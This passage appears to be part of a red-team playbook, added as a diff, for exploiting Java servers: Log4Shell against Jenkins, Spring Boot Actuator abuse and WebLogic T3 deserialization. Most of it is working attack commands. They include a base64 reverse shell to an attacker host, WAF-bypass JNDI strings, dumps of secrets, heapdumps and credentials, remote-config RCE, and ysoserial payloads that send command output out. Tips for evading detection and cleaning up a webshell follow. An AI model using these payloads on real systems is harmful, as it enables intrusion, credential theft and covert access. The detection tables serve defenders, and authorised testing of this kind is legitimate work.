+**Context:** External engagement. Jenkins instance at `ci.target.com:8080` identified via Shodan. Version fingerprinting shows Jenkins 2.288 with bundled Log4j 2.14.0 (vulnerable).
+
+**Attack path:**
+
+```bash
+# Step 1: Confirm Jenkins is running Log4j (error-based)
+curl -sk "http://ci.target.com:8080/securityRealm/commenceLogin" \
+  -X POST -d 'j_username=admin&j_password=test' -v 2>&1 | grep -i "log4j\|x-powered"
+
+# Step 2: Start JNDI server
+REVSHELL=$(echo -n "bash -i >& /dev/tcp/${ATTACKER_IP}/4444 0>&1" | base64 -w0)
+cd /opt/tools/JNDI-Exploit-Kit
+java -jar target/JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar \
+  -L ${ATTACKER_IP}:1389 -P 8888 \
+  -C "bash -c {echo,${REVSHELL}}|{base64,-d}|bash" &
+
+# Step 3: Start listener
+nc -lvnp 4444 | tee _rtexit-output/exploit/java/log4shell/jenkins-shell.txt &
+
+# Step 4: Inject via X-Forwarded-For on the login endpoint (Jenkins logs this)
+curl -sk -X POST "http://ci.target.com:8080/securityRealm/commenceLogin" \
+  -H "X-Forwarded-For: \${jndi:ldap://${ATTACKER_IP}:1389/exploit}" \
+  -d 'j_username=admin&j_password=test'
+
+# Step 5 (if WAF blocks): Apply nested lookup bypass
+curl -sk -X POST "http://ci.target.com:8080/securityRealm/commenceLogin" \
+  -H "X-Forwarded-For: \${${lower:j}ndi:\${lower:l}dap://${ATTACKER_IP}:1389/exploit}" \
+  -d 'j_username=admin&j_password=test'
+
+# Step 6: Post-exploitation — extract Jenkins credentials store
+cat /var/jenkins_home/credentials.xml
+# Pivot to internal build infrastructure, inject malicious build steps
+```
+
+**Expected outcome:** Shell as `jenkins` service account on Jenkins host. Access to all pipeline secrets, build artifacts, SCM credentials, deployment keys.
+
+---
+
+### Scenario 2: Spring Boot API — Actuator Credential Extraction + RCE
+
+**Context:** Internal engagement. Spring Boot microservice at `api.internal.corp:8080`. Actuator is exposed without authentication (common in dev/staging environments promoted to prod).
+
+**Attack path:**
+
+```bash
+# Step 1: Discover Actuator (nuclei or manual)
+curl -sk http://api.internal.corp:8080/actuator | python3 -m json.tool
+
+# Step 2: Dump environment — extract DB credentials, API keys, secrets
+curl -sk http://api.internal.corp:8080/actuator/env \
+  | python3 -c "
+import json,sys
+d=json.load(sys.stdin)
+for ps in d.get('propertySources',[]):
+    for k,v in ps.get('properties',{}).items():
+        val=v.get('value','')
+        if any(x in k.lower() for x in ['pass','secret','key','token','url','jdbc']):
+            print(f'{k}: {val}')
+" | tee _rtexit-output/exploit/java/actuator/extracted-secrets.txt
+
+# Step 3: Download heapdump for credential mining
+curl -sk http://api.internal.corp:8080/actuator/heapdump \
+  -o _rtexit-output/exploit/java/actuator/app-heapdump.hprof
+strings _rtexit-output/exploit/java/actuator/app-heapdump.hprof \
+  | grep -iE "(password|secret|token|Authorization|Bearer|apikey)\s*[=:]\s*\S+" \
+  | sort -u | tee _rtexit-output/exploit/java/actuator/heapdump-creds.txt
+
+# Step 4: httptrace — capture recent HTTP request headers (may contain auth tokens)
+curl -sk http://api.internal.corp:8080/actuator/httptrace \
+  | python3 -m json.tool | grep -A3 "Authorization\|Cookie" \
+  | tee _rtexit-output/exploit/java/actuator/httptrace-tokens.txt
+
+# Step 5: Attempt RCE via spring.cloud env poisoning (if spring-cloud on classpath)
+# Serve a malicious remote config file
+cat > /tmp/malicious.yml << EOF
+spring:
+  datasource:
+    url: "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://${ATTACKER_IP}:8888/exploit.sql'"
+EOF
+python3 -m http.server 8888 --directory /tmp &
+
+# Poison the bootstrap config location
+curl -sk -X POST http://api.internal.corp:8080/actuator/env \
+  -H "Content-Type: application/json" \
+  -d "{\"name\":\"spring.cloud.bootstrap.location\",\"value\":\"http://${ATTACKER_IP}:8888/malicious.yml\"}"
+
+# Trigger refresh / restart
+curl -sk -X POST http://api.internal.corp:8080/actuator/refresh
+# OR
+curl -sk -X POST http://api.internal.corp:8080/actuator/restart
+```
+
+**Expected outcome:** DB credentials for production database, internal API keys, Bearer tokens for downstream services. Potential RCE via H2 INIT script injection if H2 in-memory DB is on classpath.
+
+---
+
+### Scenario 3: WebLogic Deserialization via T3 Protocol
+
+**Context:** External engagement. Oracle WebLogic Server 12.2.1.4 on `weblogic.target.com:7001`. T3 protocol port accessible from internet. Known to be vulnerable to `CVE-2020-14882` and classic deserialization via T3.
+
+**Attack path:**
+
+```bash
+# Step 1: Confirm T3 protocol accessible
+nmap -p 7001 -sV --script=weblogic-t3-info weblogic.target.com
+
+# Step 2: Test URLDNS gadget chain via T3 (safe detection)
+java -jar /opt/tools/ysoserial-all.jar URLDNS \
+  "http://${CALLBACK_DOMAIN}/weblogic-t3-detect" \
+  > /tmp/urldns-payload.bin
+
+# Send via T3 protocol using custom Python script
+python3 << 'PYEOF'
+import socket, struct, sys
+
+TARGET = "weblogic.target.com"
+PORT = 7001
+
+with open("/tmp/urldns-payload.bin", "rb") as f:
+    payload = f.read()
+
+# T3 handshake + serialize payload delivery
+t3_header = b"t3 12.2.3\nAS:255\nHL:19\nMS:10000000\n\n"
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.settimeout(10)
+sock.connect((TARGET, PORT))
+sock.send(t3_header)
+resp = sock.recv(1024)
+print(f"[+] T3 Handshake: {resp[:50]}")
+
+# Send deserialization payload
+t3_payload = struct.pack(">I", len(payload) + 4) + b"\x00\x00\x00\x00" + payload
+sock.send(t3_payload)
+resp = sock.recv(4096)
+print(f"[+] Response: {resp[:100]}")
+sock.close()
+PYEOF
+
+# Step 3: If DNS callback received, escalate to RCE
+java -jar /opt/tools/ysoserial-all.jar CommonsCollections6 \
+  "curl http://${ATTACKER_IP}:8888/weblogic-rce-confirm -d \$(id)" \
+  > /tmp/cc6-weblogic.bin
+
+# Send RCE payload via T3 (replace URLDNS payload in script above with cc6-weblogic.bin)
+
+# Step 4: CVE-2020-14882 — WebLogic Console HTTP Authentication Bypass + RCE
+# Bypass authentication via path traversal
+curl -sk "http://weblogic.target.com:7001/console/css/%252e%252e%252fconsole.portal" \
+  | grep -i "weblogic"
+
+# Execute arbitrary commands via DeployerCommand (CVE-2020-14882 + 14883 chain)
+curl -sk -X POST "http://weblogic.target.com:7001/console/css/%252e%252e%252fconsole.portal" \
+  -d "_nfpb=true&_pageLabel=&handle=com.bea.faces.renderkit.html.TabRenderer&pageCompositionContext=com.bea.wcp.portlet.jsf.view.portal.PortalDesignerViewBean.portalView&portalId=1&desktopLabel=DefaultDesktop&action=&tabs-all-tab1=DefaultDesktop+tab1&tabs-all-tab1=+&tabs-all-tab2=DefaultDesktop+tab2&tabs-all-tab2=+&pageCompositionNavigatorTable1=&pageCompositionNavigatorTable2=" \
+  | tee _rtexit-output/exploit/java/deserialization/weblogic-bypass.txt
+
+# Step 5: Document T3 endpoint findings, gadget chain used, callback proofs
+cp /tmp/cc6-weblogic.bin _rtexit-output/exploit/java/deserialization/
+```
+
+**Expected outcome:** RCE as WebLogic service account (often running as `oracle` or `root`). Access to deployed applications, data sources, keystore credentials.
+
+---
+
+## Detection and OPSEC Considerations
+
+### OPSEC Risks (What Blue Team Sees)
+
+| Technique | Detection Signal | Noise Level |
+|-----------|-----------------|-------------|
+| Log4Shell DNS probe | DNS query from target to external domain | Medium |
+| Log4Shell LDAP exploitation | Outbound LDAP connection from app server | High |
+| ysoserial payload delivery | Malformed HTTP request body, Java exception in logs | Medium |
+| Actuator enumeration | Multiple `/actuator/*` 200 responses in access log | Low-Medium |
+| Heapdump download | Large (~200MB) file download from `/actuator/heapdump` | High |
+| Spring4Shell JSP write | New `.jsp` file created in Tomcat webroot | High |
+| XXE with OOB | DNS/HTTP request from app server to external host | Medium |
+| T3 deserialization | Malformed T3 packet, `ClassNotFoundException` in WebLogic log | Medium |
+
+### OPSEC Mitigations
+
+```bash
+# Use DNS-only for initial detection (no exploit classes, no LDAP connections)
+# Only upgrade to full exploitation after DNS callback confirmed and ROE allows
+
+# Route JNDI server through redirector/proxy
+# Attacker IP should be a disposable cloud instance, not C2 infrastructure
+
+# Use HTTPS for exploit class delivery (encrypt class files in transit)
+# Reduces network-level detection of exploit class downloads
+
+# Limit Actuator enumeration — request only specific endpoints, not all at once
+# Add delays between requests to blend with normal traffic patterns
+# Use client certificate auth bypass paths if available
+
+# For heapdump download: confirm ROE allows large data exfil before attempting
+# Heapdump generates a 200-400MB download — very visible in network logs
+
+# Clean up Spring4Shell webshell immediately after use
+curl -sk "http://<TARGET>/shell.jsp?pwd=j&cmd=rm+/opt/tomcat/webapps/ROOT/shell.jsp"
+
+# For deserialization: use URLDNS first (no command execution, just DNS)
+# Confirm callback before running any RCE gadget chain
+
+# Time exploitation during business hours (blends with legitimate traffic)
+# Or during agreed maintenance windows per ROE
+```
+
+### Blue Team Indicators (What to Expect in Logs)
+
+```
+# Log4j exploit attempt in application log:
+ERROR Logging lookup for '${jndi:ldap://...}' failed
+
+# LDAP connection in network logs:
+LDAP connection to external IP on port 1389
+
+# Spring4Shell in Tomcat access log:
+POST /endpoint HTTP/1.1 - class.module.classLoader.resources...
+
+# Actuator heapdump in access log:
+GET /actuator/heapdump HTTP/1.1 200 - 204857344
+
+# Java ClassNotFoundException in WebLogic log after T3 payload:
+java.lang.ClassNotFoundException: org.apache.commons.collections.Transformer
+```
+
+---
+
+## Output and Documentation
+
+All exploitation artifacts must be saved and documented. Use the following structure:
+
+```
+_rtexit-output/exploit/java/
+├── deserialization/
+│   ├── urldns-payload.bin          # Detection-only URLDNS gadget
+│   ├── cc6-payload.bin             # CommonsCollections6 payload used
+│   ├── cc6-revshell.bin            # CC6 reverse shell payload
+│   ├── spring1-payload.bin         # Spring1 payload
+│   ├── delivery-response.txt       # HTTP response from payload delivery
+│   └── shell-session.txt           # Captured reverse shell session
+├── log4shell/
+│   ├── scan-results.txt            # log4j-scan output
+│   ├── jndi-server.log             # JNDI-Exploit-Kit server log
+│   ├── shell-session.txt           # Captured reverse shell
+│   └── callback-proof.txt          # DNS/HTTP callback confirmation
+├── spring4shell/
+│   ├── exploit-log.txt             # Spring4Shell PoC output
+│   ├── rce-output.txt              # Command execution output
+│   └── webshell-url.txt            # URL of uploaded webshell
+├── actuator/
+│   ├── env-dump.txt                # Full /actuator/env dump
+│   ├── extracted-secrets.txt       # Parsed credentials/keys
+│   ├── heapdump-creds.txt          # Strings from heapdump
+│   ├── httptrace-tokens.txt        # Authorization headers from httptrace
+│   └── full-enum.txt               # All endpoint responses
+├── xxe/
+│   ├── xxe-passwd.txt              # /etc/passwd via XXE
+│   └── oob-data.txt               # OOB exfiltrated file content
+├── jndi/
+│   └── jndi-server.log             # JNDI server activity log
+├── payloads/
+│   └── all generated payload files  # Archived for reproducibility
+└── oob-callbacks.txt               # All OOB DNS/HTTP callbacks (interactsh)
+```
+
+**Documentation template for each successful exploit:**
+
+```markdown
+## Exploit: [Technique Name]
+- **Target:** <IP/hostname:port>
+- **CVE:** <CVE number if applicable>
+- **Timestamp:** <date/time UTC>
+- **Gadget Chain / Payload Type:** <e.g., CommonsCollections6>
+- **Injection Point:** <header/parameter/endpoint>
+- **Callback Confirmation:** <DNS/HTTP callback received at timestamp>
+- **RCE Proof:** <output of id/whoami/hostname>
+- **Files:** <paths to saved artifacts>
+- **Impact:** <access level achieved, data exposed>
+- **Remediation:** <patch version, config change required>
+```
+
+---
+
+## Resources
+
+### Official CVE References
+
+- Log4Shell: https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+- Spring4Shell: https://nvd.nist.gov/vuln/detail/CVE-2022-22965
+- Log4j 2.15.0 bypass (CVE-2021-45046): https://nvd.nist.gov/vuln/detail/CVE-2021-45046
+
+### Tools
+
+- **ysoserial:** https://github.com/frohoff/ysoserial
+- **JNDI-Exploit-Kit:** https://github.com/pimps/JNDI-Exploit-Kit
+- **marshalsec:** https://github.com/mbechler/marshalsec
+- **log4j-scan:** https://github.com/fullhunt/log4j-scan
+- **Spring4Shell-POC:** https://github.com/reznok/Spring4Shell-POC
+- **interactsh:** https://github.com/projectdiscovery/interactsh
+- **nuclei:** https://github.com/projectdiscovery/nuclei
+- **ysoserial-modified (extended chains):** https://github.com/wh1t3p1g/ysoserial-modified
+- **Java Deserialization Scanner (BurpSuite extension):** https://github.com/federicodotta/Java-Deserialization-Scanner
+- **GadgetProbe (gadget chain detection):** https://github.com/BishopFox/GadgetProbe
+
+### Research and Writeups
+
+- **Log4Shell LunaSec Analysis:** https://www.lunasec.io/docs/blog/log4j-zero-day/
+- **Log4Shell WAF Bypass Techniques:** https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
+- **Spring4Shell Analysis:** https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
+- **Java Deserialization Bible:** https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
+- **Marshalling Pickles (AppSec 2015):** https://frohoff.github.io/appseccali-marshalling-pickles/
+- **Exploiting Spring Boot Actuators:** https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
+- **JNDI Injection Writeup:** https://paper.seebug.org/1091/
+- **WebLogic T3 Deserialization:** https://github.com/zhzyker/CVE-2020-14882
+- **Gadget Inspector (classpath analysis):** https://github.com/JackOfMostTrades/gadgetinspector
+
+### Wordlists and Payloads
+
+- **Log4j bypass wordlist:** https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words
+- **SecLists Java-related:** https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/Injection
+
+### Cheat Sheets
+
+- **PayloadsAllTheThings — Java Deserialization:** https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure%20Deserialization/Java.md
+- **PayloadsAllTheThings — XXE:** https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection
+- **HackTricks — Log4Shell:** https://book.hacktricks.xyz/pentesting-web/log4shell
+- **HackTricks — Spring Actuator:** https://book.hacktricks.xyz/pentesting-web/spring-actuators